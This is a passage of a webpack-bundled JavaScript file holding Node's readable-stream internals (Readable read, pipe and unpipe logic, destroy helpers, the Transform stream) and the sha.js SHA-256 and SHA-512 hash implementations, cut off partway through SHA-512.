  // has returned yet), so that we know whether or not it's safe to emit
  // 'readable' etc.
  //
  // 3. Actually pull the requested chunks out of the buffer and return.

  // if we need a readable event, then we need to do some reading.
  var doRead = state.needReadable;
  debug('need readable', doRead);

  // if we currently have less than the highWaterMark, then also read some
  if (state.length === 0 || state.length - n < state.highWaterMark) {
    doRead = true;
    debug('length less than watermark', doRead);
  }

  // however, if we've ended, then there's no point, and if we're already
  // reading, then it's unnecessary.
  if (state.ended || state.reading) {
    doRead = false;
    debug('reading or ended', doRead);
  } else if (doRead) {
    debug('do read');
    state.reading = true;
    state.sync = true;
    // if the length is currently zero, then we *need* a readable event.
    if (state.length === 0) state.needReadable = true;
    // call internal read method
    this._read(state.highWaterMark);
    state.sync = false;
    // If _read pushed data synchronously, then `reading` will be false,
    // and we need to re-evaluate how much data we can return to the user.
    if (!state.reading) n = howMuchToRead(nOrig, state);
  }

  var ret;
  if (n > 0) ret = fromList(n, state);else ret = null;

  if (ret === null) {
    state.needReadable = true;
    n = 0;
  } else {
    state.length -= n;
  }

  if (state.length === 0) {
    // If we have nothing in the buffer, then we want to know
    // as soon as we *do* get something into the buffer.
    if (!state.ended) state.needReadable = true;

    // If we tried to read() past the EOF, then emit end on the next tick.
    if (nOrig !== n && state.ended) endReadable(this);
  }

  if (ret !== null) this.emit('data', ret);

  return ret;
};

function onEofChunk(stream, state) {
  if (state.ended) return;
  if (state.decoder) {
    var chunk = state.decoder.end();
    if (chunk && chunk.length) {
      state.buffer.push(chunk);
      state.length += state.objectMode ? 1 : chunk.length;
    }
  }
  state.ended = true;

  // emit 'readable' now to make sure it gets picked up.
  emitReadable(stream);
}

// Don't emit readable right away in sync mode, because this can trigger
// another read() call => stack overflow.  This way, it might trigger
// a nextTick recursion warning, but that's not so bad.
function emitReadable(stream) {
  var state = stream._readableState;
  state.needReadable = false;
  if (!state.emittedReadable) {
    debug('emitReadable', state.flowing);
    state.emittedReadable = true;
    if (state.sync) pna.nextTick(emitReadable_, stream);else emitReadable_(stream);
  }
}

function emitReadable_(stream) {
  debug('emit readable');
  stream.emit('readable');
  flow(stream);
}

// at this point, the user has presumably seen the 'readable' event,
// and called read() to consume some data.  that may have triggered
// in turn another _read(n) call, in which case reading = true if
// it's in progress.
// However, if we're not ended, or reading, and the length < hwm,
// then go ahead and try to read some more preemptively.
function maybeReadMore(stream, state) {
  if (!state.readingMore) {
    state.readingMore = true;
    pna.nextTick(maybeReadMore_, stream, state);
  }
}

function maybeReadMore_(stream, state) {
  var len = state.length;
  while (!state.reading && !state.flowing && !state.ended && state.length < state.highWaterMark) {
    debug('maybeReadMore read 0');
    stream.read(0);
    if (len === state.length)
      // didn't get any data, stop spinning.
      break;else len = state.length;
  }
  state.readingMore = false;
}

// abstract method.  to be overridden in specific implementation classes.
// call cb(er, data) where data is <= n in length.
// for virtual (non-string, non-buffer) streams, "length" is somewhat
// arbitrary, and perhaps not very meaningful.
Readable.prototype._read = function (n) {
  this.emit('error', new Error('_read() is not implemented'));
};

Readable.prototype.pipe = function (dest, pipeOpts) {
  var src = this;
  var state = this._readableState;

  switch (state.pipesCount) {
    case 0:
      state.pipes = dest;
      break;
    case 1:
      state.pipes = [state.pipes, dest];
      break;
    default:
      state.pipes.push(dest);
      break;
  }
  state.pipesCount += 1;
  debug('pipe count=%d opts=%j', state.pipesCount, pipeOpts);

  var doEnd = (!pipeOpts || pipeOpts.end !== false) && dest !== process.stdout && dest !== process.stderr;

  var endFn = doEnd ? onend : unpipe;
  if (state.endEmitted) pna.nextTick(endFn);else src.once('end', endFn);

  dest.on('unpipe', onunpipe);
  function onunpipe(readable, unpipeInfo) {
    debug('onunpipe');
    if (readable === src) {
      if (unpipeInfo && unpipeInfo.hasUnpiped === false) {
        unpipeInfo.hasUnpiped = true;
        cleanup();
      }
    }
  }

  function onend() {
    debug('onend');
    dest.end();
  }

  // when the dest drains, it reduces the awaitDrain counter
  // on the source.  This would be more elegant with a .once()
  // handler in flow(), but adding and removing repeatedly is
  // too slow.
  var ondrain = pipeOnDrain(src);
  dest.on('drain', ondrain);

  var cleanedUp = false;
  function cleanup() {
    debug('cleanup');
    // cleanup event handlers once the pipe is broken
    dest.removeListener('close', onclose);
    dest.removeListener('finish', onfinish);
    dest.removeListener('drain', ondrain);
    dest.removeListener('error', onerror);
    dest.removeListener('unpipe', onunpipe);
    src.removeListener('end', onend);
    src.removeListener('end', unpipe);
    src.removeListener('data', ondata);

    cleanedUp = true;

    // if the reader is waiting for a drain event from this
    // specific writer, then it would cause it to never start
    // flowing again.
    // So, if this is awaiting a drain, then we just call it now.
    // If we don't know, then assume that we are waiting for one.
    if (state.awaitDrain && (!dest._writableState || dest._writableState.needDrain)) ondrain();
  }

  // If the user pushes more data while we're writing to dest then we'll end up
  // in ondata again. However, we only want to increase awaitDrain once because
  // dest will only emit one 'drain' event for the multiple writes.
  // => Introduce a guard on increasing awaitDrain.
  var increasedAwaitDrain = false;
  src.on('data', ondata);
  function ondata(chunk) {
    debug('ondata');
    increasedAwaitDrain = false;
    var ret = dest.write(chunk);
    if (false === ret && !increasedAwaitDrain) {
      // If the user unpiped during `dest.write()`, it is possible
      // to get stuck in a permanently paused state if that write
      // also returned false.
      // => Check whether `dest` is still a piping destination.
      if ((state.pipesCount === 1 && state.pipes === dest || state.pipesCount > 1 && indexOf(state.pipes, dest) !== -1) && !cleanedUp) {
        debug('false write response, pause', src._readableState.awaitDrain);
        src._readableState.awaitDrain++;
        increasedAwaitDrain = true;
      }
      src.pause();
    }
  }

  // if the dest has an error, then stop piping into it.
  // however, don't suppress the throwing behavior for this.
  function onerror(er) {
    debug('onerror', er);
    unpipe();
    dest.removeListener('error', onerror);
    if (EElistenerCount(dest, 'error') === 0) dest.emit('error', er);
  }

  // Make sure our error handler is attached before userland ones.
  prependListener(dest, 'error', onerror);

  // Both close and finish should trigger unpipe, but only once.
  function onclose() {
    dest.removeListener('finish', onfinish);
    unpipe();
  }
  dest.once('close', onclose);
  function onfinish() {
    debug('onfinish');
    dest.removeListener('close', onclose);
    unpipe();
  }
  dest.once('finish', onfinish);

  function unpipe() {
    debug('unpipe');
    src.unpipe(dest);
  }

  // tell the dest that it's being piped to
  dest.emit('pipe', src);

  // start the flow if it hasn't been started already.
  if (!state.flowing) {
    debug('pipe resume');
    src.resume();
  }

  return dest;
};

function pipeOnDrain(src) {
  return function () {
    var state = src._readableState;
    debug('pipeOnDrain', state.awaitDrain);
    if (state.awaitDrain) state.awaitDrain--;
    if (state.awaitDrain === 0 && EElistenerCount(src, 'data')) {
      state.flowing = true;
      flow(src);
    }
  };
}

Readable.prototype.unpipe = function (dest) {
  var state = this._readableState;
  var unpipeInfo = { hasUnpiped: false };

  // if we're not piping anywhere, then do nothing.
  if (state.pipesCount === 0) return this;

  // just one destination.  most common case.
  if (state.pipesCount === 1) {
    // passed in one, but it's not the right one.
    if (dest && dest !== state.pipes) return this;

    if (!dest) dest = state.pipes;

    // got a match.
    state.pipes = null;
    state.pipesCount = 0;
    state.flowing = false;
    if (dest) dest.emit('unpipe', this, unpipeInfo);
    return this;
  }

  // slow case. multiple pipe destinations.

  if (!dest) {
    // remove all.
    var dests = state.pipes;
    var len = state.pipesCount;
    state.pipes = null;
    state.pipesCount = 0;
    state.flowing = false;

    for (var i = 0; i < len; i++) {
      dests[i].emit('unpipe', this, unpipeInfo);
    }return this;
  }

  // try to find the right one.
  var index = indexOf(state.pipes, dest);
  if (index === -1) return this;

  state.pipes.splice(index, 1);
  state.pipesCount -= 1;
  if (state.pipesCount === 1) state.pipes = state.pipes[0];

  dest.emit('unpipe', this, unpipeInfo);

  return this;
};

// set up data events if they are asked for
// Ensure readable listeners eventually get something
Readable.prototype.on = function (ev, fn) {
  var res = Stream.prototype.on.call(this, ev, fn);

  if (ev === 'data') {
    // Start flowing on next tick if stream isn't explicitly paused
    if (this._readableState.flowing !== false) this.resume();
  } else if (ev === 'readable') {
    var state = this._readableState;
    if (!state.endEmitted && !state.readableListening) {
      state.readableListening = state.needReadable = true;
      state.emittedReadable = false;
      if (!state.reading) {
        pna.nextTick(nReadingNextTick, this);
      } else if (state.length) {
        emitReadable(this);
      }
    }
  }

  return res;
};
Readable.prototype.addListener = Readable.prototype.on;

function nReadingNextTick(self) {
  debug('readable nexttick read 0');
  self.read(0);
}

// pause() and resume() are remnants of the legacy readable stream API
// If the user uses them, then switch into old mode.
Readable.prototype.resume = function () {
  var state = this._readableState;
  if (!state.flowing) {
    debug('resume');
    state.flowing = true;
    resume(this, state);
  }
  return this;
};

function resume(stream, state) {
  if (!state.resumeScheduled) {
    state.resumeScheduled = true;
    pna.nextTick(resume_, stream, state);
  }
}

function resume_(stream, state) {
  if (!state.reading) {
    debug('resume read 0');
    stream.read(0);
  }

  state.resumeScheduled = false;
  state.awaitDrain = 0;
  stream.emit('resume');
  flow(stream);
  if (state.flowing && !state.reading) stream.read(0);
}

Readable.prototype.pause = function () {
  debug('call pause flowing=%j', this._readableState.flowing);
  if (false !== this._readableState.flowing) {
    debug('pause');
    this._readableState.flowing = false;
    this.emit('pause');
  }
  return this;
};

function flow(stream) {
  var state = stream._readableState;
  debug('flow', state.flowing);
  while (state.flowing && stream.read() !== null) {}
}

// wrap an old-style stream as the async data source.
// This is *not* part of the readable stream interface.
// It is an ugly unfortunate mess of history.
Readable.prototype.wrap = function (stream) {
  var _this = this;

  var state = this._readableState;
  var paused = false;

  stream.on('end', function () {
    debug('wrapped end');
    if (state.decoder && !state.ended) {
      var chunk = state.decoder.end();
      if (chunk && chunk.length) _this.push(chunk);
    }

    _this.push(null);
  });

  stream.on('data', function (chunk) {
    debug('wrapped data');
    if (state.decoder) chunk = state.decoder.write(chunk);

    // don't skip over falsy values in objectMode
    if (state.objectMode && (chunk === null || chunk === undefined)) return;else if (!state.objectMode && (!chunk || !chunk.length)) return;

    var ret = _this.push(chunk);
    if (!ret) {
      paused = true;
      stream.pause();
    }
  });

  // proxy all the other methods.
  // important when wrapping filters and duplexes.
  for (var i in stream) {
    if (this[i] === undefined && typeof stream[i] === 'function') {
      this[i] = function (method) {
        return function () {
          return stream[method].apply(stream, arguments);
        };
      }(i);
    }
  }

  // proxy certain important events.
  for (var n = 0; n < kProxyEvents.length; n++) {
    stream.on(kProxyEvents[n], this.emit.bind(this, kProxyEvents[n]));
  }

  // when we try to consume some more bytes, simply unpause the
  // underlying stream.
  this._read = function (n) {
    debug('wrapped _read', n);
    if (paused) {
      paused = false;
      stream.resume();
    }
  };

  return this;
};

Object.defineProperty(Readable.prototype, 'readableHighWaterMark', {
  // making it explicit this property is not enumerable
  // because otherwise some prototype manipulation in
  // userland will fail
  enumerable: false,
  get: function () {
    return this._readableState.highWaterMark;
  }
});

// exposed for testing purposes only.
Readable._fromList = fromList;

// Pluck off n bytes from an array of buffers.
// Length is the combined lengths of all the buffers in the list.
// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function fromList(n, state) {
  // nothing buffered
  if (state.length === 0) return null;

  var ret;
  if (state.objectMode) ret = state.buffer.shift();else if (!n || n >= state.length) {
    // read it all, truncate the list
    if (state.decoder) ret = state.buffer.join('');else if (state.buffer.length === 1) ret = state.buffer.head.data;else ret = state.buffer.concat(state.length);
    state.buffer.clear();
  } else {
    // read part of list
    ret = fromListPartial(n, state.buffer, state.decoder);
  }

  return ret;
}

// Extracts only enough buffered data to satisfy the amount requested.
// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function fromListPartial(n, list, hasStrings) {
  var ret;
  if (n < list.head.data.length) {
    // slice is the same for buffers and strings
    ret = list.head.data.slice(0, n);
    list.head.data = list.head.data.slice(n);
  } else if (n === list.head.data.length) {
    // first chunk is a perfect match
    ret = list.shift();
  } else {
    // result spans more than one buffer
    ret = hasStrings ? copyFromBufferString(n, list) : copyFromBuffer(n, list);
  }
  return ret;
}

// Copies a specified amount of characters from the list of buffered data
// chunks.
// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function copyFromBufferString(n, list) {
  var p = list.head;
  var c = 1;
  var ret = p.data;
  n -= ret.length;
  while (p = p.next) {
    var str = p.data;
    var nb = n > str.length ? str.length : n;
    if (nb === str.length) ret += str;else ret += str.slice(0, n);
    n -= nb;
    if (n === 0) {
      if (nb === str.length) {
        ++c;
        if (p.next) list.head = p.next;else list.head = list.tail = null;
      } else {
        list.head = p;
        p.data = str.slice(nb);
      }
      break;
    }
    ++c;
  }
  list.length -= c;
  return ret;
}

// Copies a specified amount of bytes from the list of buffered data chunks.
// This function is designed to be inlinable, so please take care when making
// changes to the function body.
function copyFromBuffer(n, list) {
  var ret = Buffer.allocUnsafe(n);
  var p = list.head;
  var c = 1;
  p.data.copy(ret);
  n -= p.data.length;
  while (p = p.next) {
    var buf = p.data;
    var nb = n > buf.length ? buf.length : n;
    buf.copy(ret, ret.length - n, 0, nb);
    n -= nb;
    if (n === 0) {
      if (nb === buf.length) {
        ++c;
        if (p.next) list.head = p.next;else list.head = list.tail = null;
      } else {
        list.head = p;
        p.data = buf.slice(nb);
      }
      break;
    }
    ++c;
  }
  list.length -= c;
  return ret;
}

function endReadable(stream) {
  var state = stream._readableState;

  // If we get here before consuming all the bytes, then that is a
  // bug in node.  Should never happen.
  if (state.length > 0) throw new Error('"endReadable()" called on non-empty stream');

  if (!state.endEmitted) {
    state.ended = true;
    pna.nextTick(endReadableNT, state, stream);
  }
}

function endReadableNT(state, stream) {
  // Check that we didn't get one last unshift.
  if (!state.endEmitted && state.length === 0) {
    state.endEmitted = true;
    stream.readable = false;
    stream.emit('end');
  }
}

function indexOf(xs, x) {
  for (var i = 0, l = xs.length; i < l; i++) {
    if (xs[i] === x) return i;
  }
  return -1;
}
/* WEBPACK VAR INJECTION */}.call(exports, __webpack_require__(17), __webpack_require__(83)))

/***/ }),
/* 1236 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = __webpack_require__(275).EventEmitter;


/***/ }),
/* 1237 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";


/*<replacement>*/

var pna = __webpack_require__(486);
/*</replacement>*/

// undocumented cb() API, needed for core, not for public API
function destroy(err, cb) {
  var _this = this;

  var readableDestroyed = this._readableState && this._readableState.destroyed;
  var writableDestroyed = this._writableState && this._writableState.destroyed;

  if (readableDestroyed || writableDestroyed) {
    if (cb) {
      cb(err);
    } else if (err && (!this._writableState || !this._writableState.errorEmitted)) {
      pna.nextTick(emitErrorNT, this, err);
    }
    return this;
  }

  // we set destroyed to true before firing error callbacks in order
  // to make it re-entrance safe in case destroy() is called within callbacks

  if (this._readableState) {
    this._readableState.destroyed = true;
  }

  // if this is a duplex stream mark the writable part as destroyed as well
  if (this._writableState) {
    this._writableState.destroyed = true;
  }

  this._destroy(err || null, function (err) {
    if (!cb && err) {
      pna.nextTick(emitErrorNT, _this, err);
      if (_this._writableState) {
        _this._writableState.errorEmitted = true;
      }
    } else if (cb) {
      cb(err);
    }
  });

  return this;
}

function undestroy() {
  if (this._readableState) {
    this._readableState.destroyed = false;
    this._readableState.reading = false;
    this._readableState.ended = false;
    this._readableState.endEmitted = false;
  }

  if (this._writableState) {
    this._writableState.destroyed = false;
    this._writableState.ended = false;
    this._writableState.ending = false;
    this._writableState.finished = false;
    this._writableState.errorEmitted = false;
  }
}

function emitErrorNT(self, err) {
  self.emit('error', err);
}

module.exports = {
  destroy: destroy,
  undestroy: undestroy
};

/***/ }),
/* 1238 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

// a transform stream is a readable/writable stream where you do
// something with the data.  Sometimes it's called a "filter",
// but that's not a great name for it, since that implies a thing where
// some bits pass through, and others are simply ignored.  (That would
// be a valid example of a transform, of course.)
//
// While the output is causally related to the input, it's not a
// necessarily symmetric or synchronous transformation.  For example,
// a zlib stream might take multiple plain-text writes(), and then
// emit a single compressed chunk some time in the future.
//
// Here's how this works:
//
// The Transform stream has all the aspects of the readable and writable
// stream classes.  When you write(chunk), that calls _write(chunk,cb)
// internally, and returns false if there's a lot of pending writes
// buffered up.  When you call read(), that calls _read(n) until
// there's enough pending readable data buffered up.
//
// In a transform stream, the written data is placed in a buffer.  When
// _read(n) is called, it transforms the queued up data, calling the
// buffered _write cb's as it consumes chunks.  If consuming a single
// written chunk would result in multiple output chunks, then the first
// outputted bit calls the readcb, and subsequent chunks just go into
// the read buffer, and will cause it to emit 'readable' if necessary.
//
// This way, back-pressure is actually determined by the reading side,
// since _read has to be called to start processing a new chunk.  However,
// a pathological inflate type of transform can cause excessive buffering
// here.  For example, imagine a stream where every byte of input is
// interpreted as an integer from 0-255, and then results in that many
// bytes of output.  Writing the 4 bytes {ff,ff,ff,ff} would result in
// 1kb of data being output.  In this case, you could write a very small
// amount of input, and end up with a very large amount of output.  In
// such a pathological inflating mechanism, there'd be no way to tell
// the system to stop doing the transform.  A single 4MB write could
// cause the system to run out of memory.
//
// However, even in such a pathological case, only a single written chunk
// would be consumed, and then the rest would wait (un-transformed) until
// the results of the previous transformed chunk were consumed.



module.exports = Transform;

var Duplex = __webpack_require__(237);

/*<replacement>*/
var util = __webpack_require__(347);
util.inherits = __webpack_require__(348);
/*</replacement>*/

util.inherits(Transform, Duplex);

function afterTransform(er, data) {
  var ts = this._transformState;
  ts.transforming = false;

  var cb = ts.writecb;

  if (!cb) {
    return this.emit('error', new Error('write callback called multiple times'));
  }

  ts.writechunk = null;
  ts.writecb = null;

  if (data != null) // single equals check for both `null` and `undefined`
    this.push(data);

  cb(er);

  var rs = this._readableState;
  rs.reading = false;
  if (rs.needReadable || rs.length < rs.highWaterMark) {
    this._read(rs.highWaterMark);
  }
}

function Transform(options) {
  if (!(this instanceof Transform)) return new Transform(options);

  Duplex.call(this, options);

  this._transformState = {
    afterTransform: afterTransform.bind(this),
    needTransform: false,
    transforming: false,
    writecb: null,
    writechunk: null,
    writeencoding: null
  };

  // start out asking for a readable event once data is transformed.
  this._readableState.needReadable = true;

  // we have implemented the _read method, and done the other things
  // that Readable wants before the first _read call, so unset the
  // sync guard flag.
  this._readableState.sync = false;

  if (options) {
    if (typeof options.transform === 'function') this._transform = options.transform;

    if (typeof options.flush === 'function') this._flush = options.flush;
  }

  // When the writable side finishes, then flush out anything remaining.
  this.on('prefinish', prefinish);
}

function prefinish() {
  var _this = this;

  if (typeof this._flush === 'function') {
    this._flush(function (er, data) {
      done(_this, er, data);
    });
  } else {
    done(this, null, null);
  }
}

Transform.prototype.push = function (chunk, encoding) {
  this._transformState.needTransform = false;
  return Duplex.prototype.push.call(this, chunk, encoding);
};

// This is the part where you do stuff!
// override this function in implementation classes.
// 'chunk' is an input chunk.
//
// Call `push(newChunk)` to pass along transformed output
// to the readable side.  You may call 'push' zero or more times.
//
// Call `cb(err)` when you are done with this chunk.  If you pass
// an error, then that'll put the hurt on the whole operation.  If you
// never call cb(), then you'll never get another chunk.
Transform.prototype._transform = function (chunk, encoding, cb) {
  throw new Error('_transform() is not implemented');
};

Transform.prototype._write = function (chunk, encoding, cb) {
  var ts = this._transformState;
  ts.writecb = cb;
  ts.writechunk = chunk;
  ts.writeencoding = encoding;
  if (!ts.transforming) {
    var rs = this._readableState;
    if (ts.needTransform || rs.needReadable || rs.length < rs.highWaterMark) this._read(rs.highWaterMark);
  }
};

// Doesn't matter what the args are here.
// _transform does all the work.
// That we got here means that the readable side wants more data.
Transform.prototype._read = function (n) {
  var ts = this._transformState;

  if (ts.writechunk !== null && ts.writecb && !ts.transforming) {
    ts.transforming = true;
    this._transform(ts.writechunk, ts.writeencoding, ts.afterTransform);
  } else {
    // mark that we need a transform, so that any data that comes in
    // will get processed, now that we've asked for it.
    ts.needTransform = true;
  }
};

Transform.prototype._destroy = function (err, cb) {
  var _this2 = this;

  Duplex.prototype._destroy.call(this, err, function (err2) {
    cb(err2);
    _this2.emit('close');
  });
};

function done(stream, er, data) {
  if (er) return stream.emit('error', er);

  if (data != null) // single equals check for both `null` and `undefined`
    stream.push(data);

  // if there's nothing in the write buffer, then that means
  // that nothing more will ever be provided
  if (stream._writableState.length) throw new Error('Calling transform done when ws.length != 0');

  if (stream._transformState.transforming) throw new Error('Calling transform done when still transforming');

  return stream.push(null);
}

/***/ }),
/* 1239 */
/***/ (function(module, exports, __webpack_require__) {

/**
 * A JavaScript implementation of the Secure Hash Algorithm, SHA-256, as defined
 * in FIPS 180-2
 * Version 2.2-beta Copyright Angel Marin, Paul Johnston 2000 - 2009.
 * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
 *
 */

var inherits = __webpack_require__(25)
var Hash = __webpack_require__(276)
var Buffer = __webpack_require__(41).Buffer

var K = [
  0x428A2F98, 0x71374491, 0xB5C0FBCF, 0xE9B5DBA5,
  0x3956C25B, 0x59F111F1, 0x923F82A4, 0xAB1C5ED5,
  0xD807AA98, 0x12835B01, 0x243185BE, 0x550C7DC3,
  0x72BE5D74, 0x80DEB1FE, 0x9BDC06A7, 0xC19BF174,
  0xE49B69C1, 0xEFBE4786, 0x0FC19DC6, 0x240CA1CC,
  0x2DE92C6F, 0x4A7484AA, 0x5CB0A9DC, 0x76F988DA,
  0x983E5152, 0xA831C66D, 0xB00327C8, 0xBF597FC7,
  0xC6E00BF3, 0xD5A79147, 0x06CA6351, 0x14292967,
  0x27B70A85, 0x2E1B2138, 0x4D2C6DFC, 0x53380D13,
  0x650A7354, 0x766A0ABB, 0x81C2C92E, 0x92722C85,
  0xA2BFE8A1, 0xA81A664B, 0xC24B8B70, 0xC76C51A3,
  0xD192E819, 0xD6990624, 0xF40E3585, 0x106AA070,
  0x19A4C116, 0x1E376C08, 0x2748774C, 0x34B0BCB5,
  0x391C0CB3, 0x4ED8AA4A, 0x5B9CCA4F, 0x682E6FF3,
  0x748F82EE, 0x78A5636F, 0x84C87814, 0x8CC70208,
  0x90BEFFFA, 0xA4506CEB, 0xBEF9A3F7, 0xC67178F2
]

var W = new Array(64)

function Sha256 () {
  this.init()

  this._w = W // new Array(64)

  Hash.call(this, 64, 56)
}

inherits(Sha256, Hash)

Sha256.prototype.init = function () {
  this._a = 0x6a09e667
  this._b = 0xbb67ae85
  this._c = 0x3c6ef372
  this._d = 0xa54ff53a
  this._e = 0x510e527f
  this._f = 0x9b05688c
  this._g = 0x1f83d9ab
  this._h = 0x5be0cd19

  return this
}

function ch (x, y, z) {
  return z ^ (x & (y ^ z))
}

function maj (x, y, z) {
  return (x & y) | (z & (x | y))
}

function sigma0 (x) {
  return (x >>> 2 | x << 30) ^ (x >>> 13 | x << 19) ^ (x >>> 22 | x << 10)
}

function sigma1 (x) {
  return (x >>> 6 | x << 26) ^ (x >>> 11 | x << 21) ^ (x >>> 25 | x << 7)
}

function gamma0 (x) {
  return (x >>> 7 | x << 25) ^ (x >>> 18 | x << 14) ^ (x >>> 3)
}

function gamma1 (x) {
  return (x >>> 17 | x << 15) ^ (x >>> 19 | x << 13) ^ (x >>> 10)
}

Sha256.prototype._update = function (M) {
  var W = this._w

  var a = this._a | 0
  var b = this._b | 0
  var c = this._c | 0
  var d = this._d | 0
  var e = this._e | 0
  var f = this._f | 0
  var g = this._g | 0
  var h = this._h | 0

  for (var i = 0; i < 16; ++i) W[i] = M.readInt32BE(i * 4)
  for (; i < 64; ++i) W[i] = (gamma1(W[i - 2]) + W[i - 7] + gamma0(W[i - 15]) + W[i - 16]) | 0

  for (var j = 0; j < 64; ++j) {
    var T1 = (h + sigma1(e) + ch(e, f, g) + K[j] + W[j]) | 0
    var T2 = (sigma0(a) + maj(a, b, c)) | 0

    h = g
    g = f
    f = e
    e = (d + T1) | 0
    d = c
    c = b
    b = a
    a = (T1 + T2) | 0
  }

  this._a = (a + this._a) | 0
  this._b = (b + this._b) | 0
  this._c = (c + this._c) | 0
  this._d = (d + this._d) | 0
  this._e = (e + this._e) | 0
  this._f = (f + this._f) | 0
  this._g = (g + this._g) | 0
  this._h = (h + this._h) | 0
}

Sha256.prototype._hash = function () {
  var H = Buffer.allocUnsafe(32)

  H.writeInt32BE(this._a, 0)
  H.writeInt32BE(this._b, 4)
  H.writeInt32BE(this._c, 8)
  H.writeInt32BE(this._d, 12)
  H.writeInt32BE(this._e, 16)
  H.writeInt32BE(this._f, 20)
  H.writeInt32BE(this._g, 24)
  H.writeInt32BE(this._h, 28)

  return H
}

module.exports = Sha256


/***/ }),
/* 1240 */
/***/ (function(module, exports, __webpack_require__) {

var inherits = __webpack_require__(25)
var Hash = __webpack_require__(276)
var Buffer = __webpack_require__(41).Buffer

var K = [
  0x428a2f98, 0xd728ae22, 0x71374491, 0x23ef65cd,
  0xb5c0fbcf, 0xec4d3b2f, 0xe9b5dba5, 0x8189dbbc,
  0x3956c25b, 0xf348b538, 0x59f111f1, 0xb605d019,
  0x923f82a4, 0xaf194f9b, 0xab1c5ed5, 0xda6d8118,
  0xd807aa98, 0xa3030242, 0x12835b01, 0x45706fbe,
  0x243185be, 0x4ee4b28c, 0x550c7dc3, 0xd5ffb4e2,
  0x72be5d74, 0xf27b896f, 0x80deb1fe, 0x3b1696b1,
  0x9bdc06a7, 0x25c71235, 0xc19bf174, 0xcf692694,
  0xe49b69c1, 0x9ef14ad2, 0xefbe4786, 0x384f25e3,
  0x0fc19dc6, 0x8b8cd5b5, 0x240ca1cc, 0x77ac9c65,
  0x2de92c6f, 0x592b0275, 0x4a7484aa, 0x6ea6e483,
  0x5cb0a9dc, 0xbd41fbd4, 0x76f988da, 0x831153b5,
  0x983e5152, 0xee66dfab, 0xa831c66d, 0x2db43210,
  0xb00327c8, 0x98fb213f, 0xbf597fc7, 0xbeef0ee4,
  0xc6e00bf3, 0x3da88fc2, 0xd5a79147, 0x930aa725,
  0x06ca6351, 0xe003826f, 0x14292967, 0x0a0e6e70,
  0x27b70a85, 0x46d22ffc, 0x2e1b2138, 0x5c26c926,
  0x4d2c6dfc, 0x5ac42aed, 0x53380d13, 0x9d95b3df,
  0x650a7354, 0x8baf63de, 0x766a0abb, 0x3c77b2a8,
  0x81c2c92e, 0x47edaee6, 0x92722c85, 0x1482353b,
  0xa2bfe8a1, 0x4cf10364, 0xa81a664b, 0xbc423001,
  0xc24b8b70, 0xd0f89791, 0xc76c51a3, 0x0654be30,
  0xd192e819, 0xd6ef5218, 0xd6990624, 0x5565a910,
  0xf40e3585, 0x5771202a, 0x106aa070, 0x32bbd1b8,
  0x19a4c116, 0xb8d2d0c8, 0x1e376c08, 0x5141ab53,
  0x2748774c, 0xdf8eeb99, 0x34b0bcb5, 0xe19b48a8,
  0x391c0cb3, 0xc5c95a63, 0x4ed8aa4a, 0xe3418acb,
  0x5b9cca4f, 0x7763e373, 0x682e6ff3, 0xd6b2b8a3,
  0x748f82ee, 0x5defb2fc, 0x78a5636f, 0x43172f60,
  0x84c87814, 0xa1f0ab72, 0x8cc70208, 0x1a6439ec,
  0x90befffa, 0x23631e28, 0xa4506ceb, 0xde82bde9,
  0xbef9a3f7, 0xb2c67915, 0xc67178f2, 0xe372532b,
  0xca273ece, 0xea26619c, 0xd186b8c7, 0x21c0c207,
  0xeada7dd6, 0xcde0eb1e, 0xf57d4f7f, 0xee6ed178,
  0x06f067aa, 0x72176fba, 0x0a637dc5, 0xa2c898a6,
  0x113f9804, 0xbef90dae, 0x1b710b35, 0x131c471b,
  0x28db77f5, 0x23047d84, 0x32caab7b, 0x40c72493,
  0x3c9ebe0a, 0x15c9bebc, 0x431d67c4, 0x9c100d4c,
  0x4cc5d4be, 0xcb3e42b6, 0x597f299c, 0xfc657e2a,
  0x5fcb6fab, 0x3ad6faec, 0x6c44198c, 0x4a475817
]

var W = new Array(160)

function Sha512 () {
  this.init()
  this._w = W

  Hash.call(this, 128, 112)
}

inherits(Sha512, Hash)

Sha512.prototype.init = function () {
  this._ah = 0x6a09e667
  this._bh = 0xbb67ae85
  this._ch = 0x3c6ef372
  this._dh = 0xa54ff53a
  this._eh = 0x510e527f
  this._fh = 0x9b05688c
  this._gh = 0x1f83d9ab
  this._hh = 0x5be0cd19

  this._al = 0xf3bcc908
  this._bl = 0x84caa73b
  this._cl = 0xfe94f82b
  this._dl = 0x5f1d36f1
  this._el = 0xade682d1
  this._fl = 0x2b3e6c1f
  this._gl = 0xfb41bd6b
  this._hl = 0x137e2179

  return this
}

function Ch (x, y, z) {
  return z ^ (x & (y ^ z))
}

function maj (x, y, z) {
  return (x & y) | (z & (x | y))
}

function sigma0 (x, xl) {
  return (x >>> 28 | xl << 4) ^ (xl >>> 2 | x << 30) ^ (xl >>> 7 | x << 25)
}

function sigma1 (x, xl) {
  return (x >>> 14 | xl << 18) ^ (x >>> 18 | xl << 14) ^ (xl >>> 9 | x << 23)
}

function Gamma0 (x, xl) {
  return (x >>> 1 | xl << 31) ^ (x >>> 8 | xl << 24) ^ (x >>> 7)
}
